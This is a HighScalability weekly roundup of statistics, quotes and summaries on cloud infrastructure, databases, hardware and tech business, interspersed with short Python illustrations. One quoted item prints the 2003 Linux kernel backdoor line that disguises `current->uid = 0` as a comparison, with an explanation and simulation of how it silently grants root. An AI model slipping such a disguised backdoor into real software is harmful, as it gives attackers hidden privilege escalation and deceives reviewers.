Stuff The Internet Says On Scalability For October 19th, 2018

Hey, wake up! It's HighScalability time:



Now that's a cloud! The largest structure ever found in the early universe. The proto-supercluster Hyperion may contain thousands of galaxies or more. (Science)

Do you like this sort of Stuff? Please support me on Patreon. I'd really appreciate it. Know anyone looking for a simple book explaining the cloud? Then please recommend my well reviewed book: Explain the Cloud Like I'm 10. They'll love it and you'll be their hero forever.

- four petabytes: added to Internet Archive per year; 60,000: patents donated by Microsoft to the Open Invention Network; 30 million: DuckDuckGo daily searches; 5 seconds: Google+ session length; 1 trillion: ARM device goal; $40B: Softbank investment in 5G; 30: Happy Birthday IRC!; 97,600: Backblaze hard drives; 15: new Lambda function minute limit; $120 Billion: Uber IPO; 12%: slowdown in global growth of internet access; 25%: video ad spending in US; 1 billion: metrics per minute processed at Netflix; 900%: inflated Facebook ad-watch times; 31 million: GitHub users; 19: new AWS Public datasets; 25%: IPv6 adoption; 300: requests for Nest data; 913: security vulnerabilities fixed by Twitter; 2.04 Gbit/s: t3.2xlarge Network Performance; 60%: chances DNA can be used to find your family; 12: Happy birthday Hacker News!; 1/137: answer to life;

- Quoteable Quotes:

- @ByMikeBaker: My favorite Paul Allen story: 47 years ago, Allen got banned from UW's computer-science lab for hogging teletype machines and swiping an acoustic coupler. UW's massive computer-science school is now named for him.

- @cpeterso: Your quote reminds me of cybernetics' Law of Requisite Variety: "If a system is to be stable, the number of states of its control mechanism must be greater than or equal to the number of states in the system being controlled."

- Mark Graham: I love Google, but their job isn’t to make copies of the homepage every 10 minutes. Ours [Wayback Machine] is.

- @gmiranda23: That is legit my favorite quote in IT: “Every application has an inherent amount of irreducible complexity. The only question is: Who will have to deal with it—the user, the application developer, or the platform developer?” -Larry Tesler

- dweis: I'm an actual author of Protocol Buffers :) I think Sandy's analysis would benefit from considering why Protocol Buffers behave the way they do rather than outright attacking the design because it doesn't appear to make sense from a PL-centric perspective. As with all software systems, there are a number of competing constraints that have been weighed that have led to compromises.

- atombender: I don't think GraphQL is over-hyped at all. Maybe it's flawed, but the design is absolutely on the right track. GraphQL completely changes how you work with APIs in a front end.

- @adrianco: The AWS EC2 NTP service has been backed by atomic clocks for the last few years...

- @BrianRoemmele: “Amazon has more job openings in their voice group than Google has in the entire company right now"—@profgalloway This is a #VoiceFirst revolution. Only few astute folks take seriously. This was foolish on multiple dimensions...

- @stephenbalaban: We've benchmarked the 2080 Ti, V100, Titan V, 2080, and 1080 Ti. 2080 Ti destroys V100 / Titan V on performance per dollar. Full blog post here...

- @kellabyte: We created TV’s without visible scan lines so artists created simulated scan lines. We moved to digital and artists create simulated analog noise. We created high resolution displays and sometimes artists create simulated pixelation. We create 4K HDR and artists simulate banding.

- Steven Acreman: My recommendation is go with Google GKE whenever possible. If you’re already on AWS then trial EKS but it doesn’t really give you that much currently.

- Nick Farrell: Music piracy is falling out of favour as streaming services become more widespread, new figures show. One in 10 people in the UK use illegal downloads, down from 18% in 2013, according to YouGov's Music Report.

- Microsoft: Azure Cosmos DB runs on over 2 million cores and 100 K machines. The cloud telemetry engine on SF processes 3 Trillion events/week. Overall, SF runs 24×7 in multiple clusters (each with 100s to many 1000s of machines), totaling over 160 K machines with over 2.5 Million cores

- @benedictevans: Globally, today there are: ~1.3bn PCs (1.1bn Windows, 200m Mac + Linux) and (say) 600m tablets ~3.75bn smartphones (8-900m iPhones, 2.25bn Google Android, 600-650m Chinese Android) 5bn+ mobile phones (including smartphones) 5.1bn people aged 18+, 5.4bn aged 16+

- jakelarkin: Apple CPU Architecture excellence is nothing short of amazing. iPhone XS A12 processors are 2x or 3x the speed of a Snapdragon 845 (Pixel 3) and have lower power consumption. For these benchmarks they're approaching consumer desktop CPU performance, which typically draw 40-50 watts, using only 4 watts in the A12.

- Ted Kaminski: The present state of asynchronous I/O on Linux is a giant, flaming garbage fire. A big part of the reason concurrency and parallelism are so conflated is that we get many purely synchronous API calls from the operating system (not just Linux), and to get around this inherent lack of concurrency in API design, we must resort to the parallelism of threads.

- Dan Houser: The polishing, rewrites, and reedits Rockstar does are immense. “We were working 100-hour weeks” several times in 2018, Dan says. The finished game includes 300,000 animations, 500,000 lines of dialogue, and many more lines of code. Even for each RDR2 trailer and TV commercial, “we probably made 70 versions, but the editors may make several hundred. Sam and I will both make lots of suggestions, as will other members of the team.”

- Mark Fontecchio: Still, the return to the old strategy reflects a new reality for Apple – smartphones are a fully mature market, so it’s logical for Apple to turn to acquisitions that stabilize its supply chain and expand its gross margins.

- Meekro: It was a hard lesson for me to learn in the past: if you care wildly more than the people around you -- so much that you work late into the night while your grandmother is dying and your coworkers are pounding drinks with their counterparts at a competitor -- you'll just end up really hurt and frustrated and they'll all think that you are the problem.

- @lukaseder: ORMs are like that unreasonable teenage crush. Luring you into sweet temptation giving you short sighted satisfaction. But then you grow up and mature and do what everyone told you to do in the first place. You choose your true love, your soul mate, your better half: SQL

- mgc8: Wonderful what a little competition can bring, after years of stagnation... Go Ryzen! (spoken as a long-time Intel user)

- Ed Felten: Today I want to write about another incident, in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we don’t know who it was that made the attempt—and we probably never will...Specifically, it added these two lines of code: `if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;`
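The trick is the single `=`: `current->uid = 0` assigns rather than compares, so a caller passing that exact flag combination silently becomes root. Because the assignment evaluates to 0, the `-EINVAL` branch never runs and the call looks perfectly normal. The Python simulation below is only a sketch of that C behavior; `Task`, `c_assign`, and `wait4_check` are hypothetical stand-ins, and the flag values are assumed from Linux's `<linux/wait.h>`.

```python
import errno
from dataclasses import dataclass

# Flag values assumed from Linux's <linux/wait.h>; only their combination matters here.
WCLONE = 0x80000000
WALL = 0x40000000


@dataclass
class Task:
    """Hypothetical stand-in for the kernel's task struct (only the uid field)."""
    uid: int


def c_assign(task: Task, value: int) -> int:
    """Emulate C's `task->uid = value`: store the value and evaluate to it."""
    task.uid = value
    return value


def wait4_check(options: int, current: Task) -> int:
    """Simulate the 2003 backdoored check and return the syscall's retval."""
    retval = 0
    # Meant to look like `current->uid == 0`; the single `=` makes it an assignment.
    # The assignment yields 0, which is falsy, so the error branch never runs.
    if options == (WCLONE | WALL) and c_assign(current, 0):
        retval = -errno.EINVAL
    return retval


caller = Task(uid=1000)
print(wait4_check(0, caller), caller.uid)              # prints: 0 1000
print(wait4_check(WCLONE | WALL, caller), caller.uid)  # prints: 0 0
```

Note how the short-circuiting `&&` (Python's `and`) keeps ordinary calls from ever touching the uid, which is what made the change so easy to overlook in review.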

- @mbushong: Mistaking a feature for an entire market is a good way to spend years on a product that eventually becomes a software release for an incumbent.

- maximilianburke: I, too, think the Azure portal is amazing to work with. It feels much more coherent than the AWS portal. I like the Azure command line package as well, in preference to the AWS CLI. I've never touched the Azure PowerShell tools and have never felt like I had to.

- Cam Cullen: Video is almost 58% of the total downstream volume of traffic on the internet. Netflix is 15% of the total downstream volume of traffic across the entire internet. More than 50% of internet traffic is encrypted, and TLS 1.3 adoption is growing. Gaming is becoming a significant force in traffic volume as gaming downloads, Twitch streaming, and professional gaming go mainstream. BitTorrent is almost 22% of total upstream volume of traffic, and over 31% in EMEA alone. Alphabet/Google applications make up over 40% of the total internet connections in APAC.

- @qconnewyork: Replicated state machines are just a way to deploy elegant business logic. @toddlmontgomery talks about Aeron Clustering, a new means for deploying replicated state machines in #Java.

- @conniechan: 3/ The UPU classifies China as a tier 3 country, giving it the steepest shipping discounts available for items shipped to tier 1 countries like the US; ~40-70% below market prices for packages 4.4 lbs. or less.

- Facebook: In practice, we’ve seen a nearly 100 percent increase in consumer engagement with the listings since we rolled out this product [AI] indexing system.

- @FMuntenescu: #Kotlin influenced a lot the way we started re-architecting Plaid, from the decision of using coroutines, to sealed classes and even (my fave) collection extension functions. I talked about it at #KotlinConf18:

- Lydia DePillis: Now, everything involved in a sale can occur within the Amazon ecosystem — for a fee. Sellers buy ads to market themselves across the site, part of what has become a multibillion dollar revenue stream for Amazon. They can also pay for access to Amazon's distribution network, avoiding the hassle of packing and shipping, for upward of $2.41 per package. Each item sold carries a "referral fee" of between 6% and 45% of its value. The company even offers loans to help sellers purchase inventory.

- walrus01: Medium sized regional AS here: I am looking at a fairly large drop in IX traffic charts for our ports that face the IX, updated every 60s, which directly corresponds in time with the beginning of the Youtube outage. (We are not big enough to have a direct, dedicated peering session with the Google/Youtube AS). At any given time of day 4pm-11pm a huge percent of our traffic is Youtube (or netflix, or amazon video, or hulu, or similar).

- @andy_pavlo: I am now aware of 4 major silicon valley companies building an internal distributed OLTP DBMS. Each story is almost the same: 1. They want a version of Spanner w/o TrueTime. 2. They evaluated @CockroachDB + TiDB + @Comdb2 + @YugaByte + @FoundationDB but decided to build their own

- @allspaw: Things that do not magically cause learning from incidents happen: 1. Being “blameless” 2. Having the right “postmortem” template 3. Making anything about the post-Incident review process mandatory Potentially controversial take, I’m aware.

- Vijay Boyapati: 9/ For many people there is little difference between what is legal and what is moral. This mindset is especially dangerous when it is held by people in power, such as Google's executives. The mindset is: if it's a legal requirement to censor, then we should do it.

- brianwski: Thank you, that is EXACTLY the correct way to look at the failure statistics! So many people seem to sort the list by failure rate and think no matter what the cost, the lowest failure rate wins. For Backblaze, we just feed it back into the cost calculation. For example: If a drive fails 1% more often but is 2% cheaper in total cost of ownership, we buy that drive. Now, total cost of ownership includes the physical space rental so more dense drives can be more expensive per TByte in raw drive cost because we can make some of that back up in physical space rental. Also, most drives seem to take about the same amount of electricity unrelated to how many TBytes are contained inside, so double the drive density is like saying it takes half as much electricity over its 4 - 5 year lifespan. Electricity is one of our largest datacenter costs, so we keep an eye on that also.
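Brian's point is that failure rate is just one input to total cost of ownership. A rough sketch of that calculation follows; the cost model (purchase amortized over a 4.5-year life, replacements bought at the annualized failure rate, flat per-slot space and power costs) and every price in it are hypothetical, not Backblaze's actual figures.

```python
from dataclasses import dataclass


@dataclass
class DriveOption:
    name: str
    price_usd: float         # purchase price per drive
    capacity_tb: float       # usable capacity per drive
    afr: float               # annualized failure rate, e.g. 0.012 for 1.2%
    slot_usd_per_yr: float   # rented rack space per drive slot per year
    power_usd_per_yr: float  # electricity per drive per year (roughly size-independent)


def cost_per_tb_year(d: DriveOption, lifespan_yr: float = 4.5) -> float:
    """Simplified total cost of ownership per TB per year (hypothetical model)."""
    amortized_purchase = d.price_usd / lifespan_yr
    expected_replacements = d.afr * d.price_usd  # failed drives bought again each year
    running = d.slot_usd_per_yr + d.power_usd_per_yr
    return (amortized_purchase + expected_replacements + running) / d.capacity_tb


# Hypothetical numbers: the denser drive costs more per raw TB and fails a bit
# more often, yet wins once space and power are spread over more terabytes.
small = DriveOption("4TB", price_usd=100, capacity_tb=4, afr=0.010,
                    slot_usd_per_yr=10, power_usd_per_yr=8)
big = DriveOption("12TB", price_usd=400, capacity_tb=12, afr=0.012,
                  slot_usd_per_yr=10, power_usd_per_yr=8)
best = min([small, big], key=cost_per_tb_year)
print(best.name)  # prints: 12TB
```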

- Dylan Walsh: While tackling this question, a team of Stanford researchers found a remarkable result: Simply seeding a few more people at random avoids the challenge of mapping a network’s contours and can spread information in a way that is essentially indistinguishable from cases involving careful analysis; seeding seven people randomly may result in roughly the same reach as seeding five people optimally.

- Cory Wilkerson: A lot of the major clouds have built products for sysadmins and not really for developers, and we want to hand power and flexibility back to the developer and give them the opportunity to pick the tools they want, configure them seamlessly, and then stand on the shoulders of the giants in the community around them on the GitHub platform

- Geoff Huston: What do the larger actors do about routing security? Chris Morrow of Google presented their plans and, interestingly, RPKI and ROAs are not part of their immediate plans. By early 2019 they are looking at using something like OpenConfig to comb the IRRs and generate route filters for their peers. RPKI and ROAs will come later.

- Nina Sparling: The most basic unit of food computing is the personal food computer, now in its 2.1 edition. It consists of a plastic container affixed to a metal frame outfitted with sensors, microcomputers, lights, and electrical wiring. The machine grows plants in a tub similar to what cafes use to collect dirty dishes. A floating styrofoam tray fits snugly inside and has evenly spaced holes where the plants grow.

- Chip Overclock: What happens between the beats of this hypothetical Planck-frequency oscillator? The question has no meaning; we believe one Planck time is the smallest possible interval that can occur.

- Netflix: a growing number of employees are becoming involved in developing content as we migrate to self-produce more of our content vs. only licensing original and non-original content

- Mark Fontecchio: And as more money goes into new strategies beyond consolidation, the largest deals have fetched higher multiples. According to the M&A KnowledgeBase, in the 10 largest acquisitions this year, targets fetched a median 4x trailing revenue, compared with less than 3x among 2015’s biggest.

- Ann Steffora Mutschler: According to Purdue University researchers, every two seconds, sensors measuring the U.S.’ electrical grid collect 3 petabytes of data – the equivalent of 3 million gigabytes. Data analysis on this scale is a challenge when crucial information is stored in an inaccessible database but the team at Purdue is working on a solution, combining quantum algorithms with classical computing on small-scale quantum computers to speed up database accessibility.

- Joel Hruska: Intel Retakes Performance Lead, but AMD Has a Death Grip on Performance Per Dollar

- Ernest Mueller: That’s why SRE is a Big Lie – because it enables people to say they’re doing a thing that could help their organization succeed, and their dev and ops engineers to have a better career and life while doing so – but not really do it.

- PeteSearch: If you squint, you can see captioning as a way of radically compressing an image. One of the projects I’ve long wanted to create is a camera that runs captioning at one frame per second, and then writes each one out as a series of lines in a log file. That would create a very simplistic story of what the camera sees over time, I think of it as a narrative sensor.

- Mark Havel: For me IRC is, quite literally, a myth.

- @andy_pavlo: Transactions are hard. Distributed transactions are harder. Distributed transactions over the WAN are final boss hardness. I'm all for new DBMSs but people should tread carefully.

- @nehanarkhede: @CapitalOne VP Streaming Data shares some cool statistics for their @apachekafka usage at #KafkaSummit — 27 billion messages/day across 1500 topics!

- @JennSandercock: Thread: I worked at a AAA company once. When I started everyone looked so miserable after literally years of hard work & crunch. So late one night after work I baked 2 cakes for the office. I sent out a mass email & we all took 30 minutes to eat cake and talk.

- @HalSinger: This also isn't a good look: Not only is Amazon not motivated to improve the customer experience, the actual customer satisfaction post-invasion is not improved.

- @pacoid: . @quaesita @google #TheAIConf: Why do businesses fail at ML? there are two definitions for "AI": research focus vs. business applications -- e.g., the potential mistake of hiring researchers to attempt to commercialize apps, a strategy which depends mostly on luck

- Backblaze: As noted, at the end of Q3 we had 584 fewer drives, but over 40 petabytes more storage space. We replaced 3TB, 4TB, and even a handful of 6TB drives with 3,600 new 12TB drives using the very same data center infrastructure. The failure rates of all of the larger drives (8, 10, and 12 TB) are very good: 1.21% AFR (Annualized Failure Rate) or less. In particular, the Seagate 10TB drives, which have been in operation for over 1 year now, are performing very nicely with a failure rate of 0.48%.
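Backblaze computes AFR from drive days rather than a simple count of drives, so drives that entered or left service mid-quarter count only for the time they actually ran. A minimal sketch of that formula; the sample fleet is hypothetical.

```python
def annualized_failure_rate(failures: int, drive_days: float) -> float:
    """AFR in percent: failures per drive-year of operation, times 100."""
    if drive_days <= 0:
        raise ValueError("drive_days must be positive")
    drive_years = drive_days / 365
    return failures / drive_years * 100


# Hypothetical fleet: 1,000 drives in service for a full year with 12 failures.
print(round(annualized_failure_rate(12, 1_000 * 365), 2))  # prints: 1.2
```

The same 6 failures would give the same 1.2% if those 1,000 drives had only run for half a year, which is why drive days, not drive counts, sit in the denominator.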

- @etherealmind: A problem with SD-WAN adoption is that its _too_ good and customers don’t believe it. “I can walk away from my MPLS, ditch routers for low cost x86, branch breakout, NFV for security and services, get analytics visibility with zero touch deployment ? __I don’t believe you__

- @danielbryantuk: "I used to be a big fan of circuit breakers, but then I realised that they often just give a downstream dependency a temporary break when an issue occurs. Changing back pressure can often solve a more fundamental issue" @chbatey #JAXLondon
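One common form of back pressure is a bounded buffer that refuses new work once it is full, so callers must slow down or shed load up front rather than a breaker tripping after the damage is done. A minimal Python sketch of that idea; `BoundedIntake` is a hypothetical name, and the talk may well have meant other mechanisms, such as demand signalling in reactive streams.

```python
import queue


class BoundedIntake:
    """Accept work only while the downstream buffer has room, pushing back on
    callers instead of letting work pile up behind a slow dependency."""

    def __init__(self, capacity: int):
        self._q: queue.Queue = queue.Queue(maxsize=capacity)

    def offer(self, item) -> bool:
        """Enqueue item; return False (the back-pressure signal) if full."""
        try:
            self._q.put_nowait(item)
            return True
        except queue.Full:
            return False

    def drain_one(self):
        """Downstream consumer takes the oldest item, or None if empty."""
        try:
            return self._q.get_nowait()
        except queue.Empty:
            return None


intake = BoundedIntake(capacity=2)
print([intake.offer(i) for i in range(4)])  # prints: [True, True, False, False]
print(intake.drain_one())                   # prints: 0
print(intake.offer(4))                      # prints: True
```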

- Bill Dally: One thing we're doing in NVIDIA Research is we're actively pursuing both autonomous vehicles and robotics. In fact, autonomous vehicles are a special case, and in many ways an easy case of robotics, in that all they really have to do is navigate around not hit anything. Robots actually have a much harder task, in that they have to manipulate, they have to pick things up, and insert bolts into nuts, they have to hit things, but hit things in a controlled way, so that they can actually manipulate the world in a way that they desire.

- James Beswick: It’s not regular Lambda at The Edge. First, there are many limitations peppered throughout the AWS blurb. You can only create 25 Lambda@Edge functions per AWS account, 25 triggers per distribution, and you cannot cheat by associating Lambdas with CloudFront in other accounts. The hard 25-distribution limit is a showstopper for any broad-scale, SaaS-style implementation.

- Ann Steffora Mutschler: “There’s a tendency sometimes among design managers to say, ‘Oh, this technique only saves me 2% and that one only saves me 5%, and that one only saves me 3.5%.’ You go down the list and none of them save 50% or 60% of your power. You come to the end of the list, then nothing seems to be worth doing yet those are the only things you can do. At every stage, pay careful attention to the power and do the appropriate low power design techniques every step of the way so by the time you come to the end, you have a low-power chip. It’s no single activity that caused that. It was all of them together.”
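The arithmetic behind that advice: if each technique independently trims its fraction of whatever power is left, small savings compound. A sketch under that simplifying assumption; real techniques can overlap or interact, and the quote does not give a model.

```python
from math import prod


def combined_savings(fractions):
    """Total fractional saving when each technique removes its fraction of
    the power remaining after the others (savings compound multiplicatively)."""
    remaining = prod(1.0 - f for f in fractions)
    return 1.0 - remaining


print(f"{combined_savings([0.02, 0.05, 0.035]):.1%}")  # prints: 10.2%
print(f"{combined_savings([0.035] * 20):.1%}")         # prints: 51.0%
```

Twenty techniques that each look like "only 3.5%" add up to roughly half the power, the 50% that no single item on the list delivers.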

- Amir Hermelin: Our [Google Cloud] first [mistake] — taking too long to recognize the potential of the enterprise. We were led by very smart engineering managers — that held tenures of 10+ years at Google, so that’s what grew their careers and that’s what they were familiar with. Seeing success with Snapchat and the likes, and lacking enough familiarity with the enterprise space, it was easy to focus away from “Large Orgs”. This included insufficient investments in marketing, sales, support, and solutions engineering, resulting in the aforementioned being inferior compared to the competitors’.

- Suyash Sonawane: These [Machine Learning] techniques have improved the conversion rate of some of the long-tail queries at Wayfair. It’s worth noting that the usefulness of customer insights generated from reviews is not only limited to search. These insights are helpful in many other ways, such as the improvement of product offerings by learning about what customers like or dislike about a product, improvements for packaging of items that are often damaged when shipping, etc.

- atchkey: Not quite, but first MVP in 3 months and $80m gross revenue in the first year. Selling t-shirts. We did it with 3 engineers, no devops or qa teams and definitely no pagers. We had zero downtime and the very rare bugs were fixed on the next push to master (CI/CD) and real testing. I'm not saying the datastore [AppEngine] is perfect, but using the datastore has well known and predictable limitations that need to be engineered for. It is definitely not something you can RTFM later on. Just like any database to be honest. It is not a relational database. It doesn't do aggregations. It is for storing data (using Objectify [0]) and memcache is for caching that data.

- Nicolas Baumard: One of the most puzzling facts about the Industrial Revolution is that many of the innovations did not require any scientific or technological input, and could actually have been made much earlier. Paul’s carding machine, Arkwright’s water frame, and Cartwright’s improvements to textile machinery were not “rocket science” (Allen, 2009b), and would not have “puzzled Archimedes” (Mokyr, 2009). Thus the puzzle of the Industrial Revolution: If these innovations were so simple, why then did it take so long for many of them to emerge?

- David Gerard: EOS ran an ICO token offering that was so egregious I used it as a perfect example of the form in chapter 9 of Attack of the 50 Foot Blockchain. You’ll be shocked to hear that there’s rampant collusion and corruption amongst the controlling nodes of their blockchain.

- Rich Miller: The DUG system also showcases the growing adoption of liquid cooling for specialized high-density workloads. The vast majority of data centers continue to cool IT equipment using air, while liquid cooling has been used primarily in HPC, which uses more powerful servers that generate more heat.

- Cloud Guru: Rule #3: Avoid Opaque Terms. At the other end of the spectrum, don’t choose a completely opaque term with no link to its functionality. Nobody who isn’t directly working with them remembers what Fargate or Greengrass or Sumerian does.

- Robert Graham: It's been fashionable lately to quote Sun Tzu or von Clausewitz on cyberwar, but it's just pretentious nonsense. Cyber needs to be understood as something in its own terms, not as an extension of traditional warfare or revolution. We need to focus on the realities of asymmetric cyber attacks, like the nation states mentioned above, or the actions of Anonymous, or the successes of cybercriminals. The reason they are successful is because of the Birthday Paradox: they aren't trying to achieve specific, narrowly defined goals, but are opportunistically exploiting any achievement that comes their way. This informs our own offensive efforts, which should be less centrally directed. This informs our defenses, which should anticipate attacks based not on their desired effect, but what our vulnerabilities make possible.
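The paradox Graham leans on: with 365 equally likely birthdays, 23 people give better-than-even odds that *some* pair matches, while matching one *specific* birthday takes 253 people. Opportunistic attackers are in the first situation. A sketch of both calculations, assuming uniform, independent birthdays.

```python
def p_any_shared(n: int, days: int = 365) -> float:
    """Probability that at least two of n people share a birthday."""
    if n > days:
        return 1.0
    p_all_distinct = 1.0
    for i in range(n):
        p_all_distinct *= (days - i) / days
    return 1.0 - p_all_distinct


def p_matches_specific(n: int, days: int = 365) -> float:
    """Probability that at least one of n people has one particular birthday."""
    return 1.0 - (1.0 - 1.0 / days) ** n


print(f"{p_any_shared(23):.3f}")        # prints: 0.507
print(f"{p_matches_specific(23):.3f}")  # prints: 0.061
```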

- David Brooks: I predict that this will lead to a democratization of fabrication technology. Intel’s “fab lead” over the past two decades meant that competitors in the PC and server markets had a very tough time providing competitive products. It seems that Intel has lost this edge, at least to TSMC, a pure-play foundry that already has at least 18 customers for their 7nm node and projects 50+ 7nm tapeouts by end of 2018. As planar technology scaling ends, commoditization will inevitably decrease the price-of-entry for 5nm and 7nm nodes. By 2030, the rise of open source cores, IP, and CAD flows targeting these advanced nodes will mean that designing and fabricating complex chips will be possible by smaller players. Hardware startups will flourish for the reasons that the open source software ecosystem paired with commoditized cloud compute has unleashed software startups over the past decade. At the same time, the value chain will be led by those providing vertically-integrated hardware-software solutions that maintain abstractions to the highest software layers. This will lead to a 10 year period of growth for the computing industry, after which we’ll have optimized the heck out of all known classical algorithms that provide societal utility. After that, let’s hope Quantum or DNA based solutions for computing, storage or molecular-photonics finally materialize.

- Morgan: If your team, say on Gmail or Android, was to integrate Google+’s features then your team would be awarded a 1.5-3x multiplier on top of your yearly bonus. Your bonus was already something like 15% of your salary. You read that correctly. A f*ck ton of money to ruin the product you were building with bloated garbage that no one wanted 😂 No one really liked this. People drank the kool-aid though, but mostly because it was green and made of paper.

- Snap is the poster child for the approach of not building your own infrastructure. By building Snap on Google App Engine they traded cost control for agility. You might remember articles like The Key to Snapchat's Profitability: It's Dirt Cheap to Run. Was that a mistake? Snap was obviously happy. Two years ago: Snap commits $2 billion over 5 years for Google Cloud infrastructure. But that was when Snap was growing fast. When growth slows and revenue doesn't materialize, you still have to live with the bets you made in better times. Snapchat’s Cloud Doesn’t Have a Silver Lining: "In the first three months of 2017, Snap’s cloud-computing bills amounted to an average of 60 cents for each daily user of Snapchat’s app. In the most recent quarter, those costs were 72 cents for each user." Is that a lot? It's hard to get numbers. One estimate for Twitter was $1.32 per active user in 2015. It's clear Snapchat was important to Google. Snapchat is mentioned several times in I’m Leaving Google — Here’s the Real Deal Behind Google Cloud. The strength of the cloud is also a weakness for startups. You pay for what you use. In that scenario every new customer costs you more money. Without revenue that's a scary cost curve.

- Videos from Strange Loop 2018 are now available. You may like Scalable Anomaly Detection (with Zero Machine Learning) detailing how Netflix built a new real-time anomaly detection system to quickly and accurately pinpoint problems in their massive galaxy of services. With this system they moved from 10 pages a week to one page a week. And they did it without AI! I know, how weird. They built a specialized system instead of relying on a more generic timeseries database approach. Why? Speed. With the old system, built using static thresholds, it could take 30 minutes to track down a problem. A sign of the growth of Netflix is how a 5 minute outage today is just as big as a 2 hour outage 5 years ago. The anomaly detection is based on a cheap to calculate metric: the median, estimated with what is effectively stochastic gradient descent. A rules engine looks at the anomaly data to make intelligent decisions to alert or not alert. Time: when did the alert happen and when did it recover? Impact: if it doesn't affect traffic, then who cares? The gold standard to determine if the system is working or not is how many "start plays per second" are happening. If you can't push play and play a video then that's a problem. Before, they would have just gotten a "windows is down" event and would have had to figure out the problem themselves. Now they get an alert that includes the cause, like the DRM system is broken. They tied it into the deployment system so they can roll back a release that causes problems. Why not AI? They don't have enough events to train a model and the problems are always changing. Their solution has a small, simple code base; predictable behaviour; a high true-positive rate; and cheap processing. It gives a rich timeline of events that provides deep insight into the system and helps root cause incidents. A downside is it's hard to onboard a new service because a lot is done by hand and that takes a lot of deep operational knowledge. Also, STRANGE LOOP 6: INDEX + THIS AND THAT.
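The summary only says the median is computed in a way that is effectively stochastic gradient descent. One well-known way to get that is the sign-based update sketched below, which keeps no history and costs one comparison per data point. This is an illustration, not necessarily Netflix's code, and the step size is an assumed parameter.

```python
import random


class StreamingMedian:
    """Running median estimate in O(1) memory. Each sample nudges the estimate
    one fixed step toward itself, which is stochastic gradient descent on the
    absolute-error loss; that loss is minimized by the median."""

    def __init__(self, step: float = 0.1):
        self.step = step  # assumed tuning knob: larger adapts faster but is noisier
        self.estimate = None

    def update(self, x: float) -> float:
        if self.estimate is None:
            self.estimate = x
        elif x > self.estimate:
            self.estimate += self.step
        elif x < self.estimate:
            self.estimate -= self.step
        return self.estimate


# Simulated metric: uniform noise between 0 and 100, whose true median is 50.
rng = random.Random(42)
median = StreamingMedian(step=0.1)
for _ in range(20_000):
    median.update(rng.uniform(0, 100))
print(round(median.estimate))  # lands close to 50
```

Because a single extreme sample moves the estimate by only one step, a spike does not drag the baseline with it, which is part of what makes the median attractive for deciding whether a metric is anomalous.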

- Videos from Oculus Connect 5: Tech talks roundup are now available.

- Here's how Facebook moves data to a datacenter nearest a user. It works kind of like a query analyzer at the datacenter access pattern level. To the best of our knowledge, Akkio is the first dynamic locality management service for geo-distributed data store systems that migrates data at microshard granularity, offers strong consistency, and operates at Facebook scale. Managing data store locality at scale with Akkio: Developed over the last three-plus years and leveraging Facebook’s unique software stack, Akkio is now in limited production and delivering on its promise with a 40 percent smaller footprint, which resulted in a 50 percent reduction of the corresponding WAN traffic and an approximately 50 percent reduction in perceived latency...Akkio helps reduce data set duplication by splitting the data sets into logical units with strong locality. The units are then stored in regions close to where the information is typically accessed. For example, if someone on Facebook accesses News Feed on a daily basis from Eugene, Oregon, it is likely that a copy is stored in our data center in Oregon, with two additional copies in Utah and New Mexico...While caching works well in certain scenarios, in practice this alternative is ineffective for most of the workloads important to Facebook...The unit of data management in Akkio is called a microshard. Each microshard is defined to contain related data that exhibits some degree of access locality with client applications. Akkio can easily support trillions of microshards...When making data placement decisions, Akkio needs to understand how the data is being accessed currently, as well as how it has been accessed in the recent past. These access patterns are stored in the Akkio Access DB.
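Weighing "how the data is being accessed currently" against "how it has been accessed in the recent past" can be done with exponentially decaying counters. The sketch below shows that idea for a single microshard; it is a hypothetical illustration, not Akkio's actual placement policy, and `RegionAccessStats`, the one-day half-life, and the region names are all assumptions.

```python
import math
from collections import defaultdict


class RegionAccessStats:
    """Hypothetical access history for one microshard: a per-region score that
    decays exponentially, so recent reads count more than older ones."""

    def __init__(self, half_life_s: float = 86_400.0):
        self.decay_per_s = math.log(2) / half_life_s
        self.scores = defaultdict(float)  # region -> decayed access score
        self.last_t = 0.0

    def _age_to(self, now: float) -> None:
        # Assumes timestamps arrive in non-decreasing order.
        factor = math.exp(-self.decay_per_s * (now - self.last_t))
        for region in self.scores:
            self.scores[region] *= factor
        self.last_t = now

    def record(self, region: str, now: float) -> None:
        self._age_to(now)
        self.scores[region] += 1.0

    def placement(self, replicas: int = 3) -> list:
        """Regions that should hold replicas, most-accessed first."""
        return sorted(self.scores, key=self.scores.get, reverse=True)[:replicas]


stats = RegionAccessStats()
stats.record("virginia", now=0)
for t in range(1, 6):
    stats.record("oregon", now=t)
stats.record("utah", now=6)
stats.record("utah", now=7)
print(stats.placement(2))  # prints: ['oregon', 'utah']

stats.record("virginia", now=10 * 86_400)  # ten half-lives later
print(stats.placement(1))  # prints: ['virginia']
```

A real system would also need hysteresis so a microshard does not bounce between regions on every small shift in traffic; the source does not say how Akkio handles that.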

- Twitter runs ZooKeeper at scale: One of the key design decisions made in ZooKeeper involves the concept of a session. A session encapsulates the states between a client and server. Sessions are the first bottleneck for scaling out ZooKeeper, because the cost of establishing and maintaining sessions is non-trivial...The next scaling bottleneck is serving read requests from hundreds of thousands of clients. In ZooKeeper, each client needs to maintain a TCP connection with the host that serves its requests. Sooner or later, the host will hit the TCP connection limit, given the growing number of clients. One part of solving this problem is the Observer, which allows for scaling out capacity for read requests without increasing the amount of consensus work...Besides these two major scaling improvements, we deployed the mixed read/write workload improvements and other small fixes from the community.

- Millions and millions of files: NVMe now in HopsFS: In our Middleware paper, we observed up to 66X throughput improvements for writing small files and up to 4.5X throughput improvements for reading small files, compared to HDFS. For latency, we saw operational latencies on Spotify’s Hadoop workload were 7.39 times lower for writing small files and 3.15 times lower for reading small files. For real-world datasets, like the Open Images 9m images dataset, we saw 4.5X improvements for reading files and 5.9X improvements for writing files. These figures were generated using only 6 NVMe disks, and we are confident that we can scale to much higher numbers with more NVMe disks. Also, Intel Optane Memory AMA Recap

- Wonderful description of your various options for load balancing users across PoPs. Dropbox traffic infrastructure: Edge network.

- Serverless doesn't mean there aren't limitations. You can even hit an all-time favorite limit: network connections. Breaking Azure Functions with Too Many Connections: I dropped the timeout down to 3 seconds. This whole thing was made much worse than it needed to be due to multiple connections sitting there open for 10 seconds at a time. Fail early, as they say, and the impact of that comes way down...it's important to reuse connections across executions by using a static client...The change I've made here is to randomise the initial visibility delay when the message first goes into the queue such that it's between 0 and 60 minutes. Also, Throttling conditions to be considered in Messaging platform – Service Bus
